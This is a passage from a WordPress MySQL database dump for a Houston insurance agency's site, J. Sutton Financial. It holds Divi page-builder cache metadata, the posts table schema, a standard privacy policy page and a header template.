:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(3074,900,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2200;s:6:\"height\";i:500;s:4:\"file\";s:34:\"2023/04/Page-Header-2200x500-1.jpg\";s:8:\"filesize\";i:1284651;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Page-Header-2200x500-1-300x68.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:68;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19716;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-1024x233.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95829;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-768x175.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60223;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-1536x349.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:189702;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-2048x465.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:308614;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49289;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-1080x500.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212805;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52090;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78552;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-1080x245.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104456;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-400x500.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84218;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:35:\"Page-Header-2200x500-1-1280x291.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139659;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-980x223.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89171;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:34:\"Page-Header-2200x500-1-480x109.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3016,878,'_et_pb_built_for_post_type','page'),(2921,615,'_thumbnail_id','0'),(2916,38,'_thumbnail_id','0'),(3206,38,'_et_builder_module_features_cache','a:2:{i:0;s:108:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":{\"528\":\"2023-04-10 13:15:21\",\"523\":\"2023-04-08 21:29:25\"},\"wpe\":[]}\";i:1;a:30:{s:46:\"et_pb_section_32a8701e7e646d30f5be44fd1d6edd9d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_c3a1c68d2adfcb81a9fe911b91eb1bb1\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c3c3262b1d77b10d3324caf58042baf2\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_3956b2fa036f918b04bf26e28a131ba0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_0d6282d7405bf99b667dc5f633c3bf57\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_e506abe2c72c9efaf068d1a321b0116c\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_0631c140be216de36055bda4ddb4903b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_e35e0a593739fb93017a5f566a0a99ac\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_f3938588590b36d0129879da117b296e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_ec559ba3d9fd0c83ea9d8973a43b05c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_694d213bc81a56bc1b8fce9db19e1cfc\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_fbd787241d3c57d74247458b14faa5c4\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_735185868ee3b7548a4975c35c2f45ba\";a:5:{s:4:\"cuma\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_c50dc261cf49e878e15a3e7ed801876a\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_027f14ef6b3669688269cc22410c2a53\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_5e53b61f9663d7c269ef65dc30c95323\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_feca5a7e180cf298b9dd26b282bb11ad\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_code_e506abe2c72c9efaf068d1a321b0116c\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_172db018d4013a78711547224058b6c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_31fed4101e23ca62587312176ae0485e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_752d704473cb7649afba5776e481f4d6\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_f83fbae2b90aa9ca67e8f7cdaad5f02e\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1c9d155ec9a950d8f0cf7d9fe5cf84e2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f6c6d70948c656773a17b5acb09701d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(3204,38,'_et_dynamic_cached_attributes','a:1:{s:15:\"animation_style\";a:1:{i:0;s:5:\"slide\";}}'),(3205,38,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3203,38,'_et_dynamic_cached_shortcodes','a:7:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:12;s:10:\"et_pb_code\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(2937,842,'_et_pb_built_for_post_type','page');
/*!40000 ALTER TABLE `wpfi_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_posts`
--

DROP TABLE IF EXISTS `wpfi_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=915 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_posts`
--

LOCK TABLES `wpfi_posts` WRITE;
/*!40000 ALTER TABLE `wpfi_posts` DISABLE KEYS */;
INSERT INTO `wpfi_posts` VALUES (3,1,'2023-02-27 11:09:48','2023-02-27 11:09:48','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px||-77px|||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Privacy Policy\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"-10px|||||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"]<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','publish','closed','open','','privacy-policy','','','2023-04-02 18:59:06','2023-04-02 18:59:06','',0,'http://cmdev-site1.com/?page_id=3',0,'page','',0),(6,1,'2023-02-28 12:58:30','2023-02-28 12:58:30','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-divi','','','2023-02-28 12:58:30','2023-02-28 12:58:30','',0,'http://cmdev-site1.com/2023/02/28/wp-global-styles-divi/',0,'wp_global_styles','',0),(10,1,'2023-02-28 13:13:33','2023-02-28 13:13:33','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','publish','open','closed','','theme-builder-layout','','','2023-03-26 19:53:02','2023-03-26 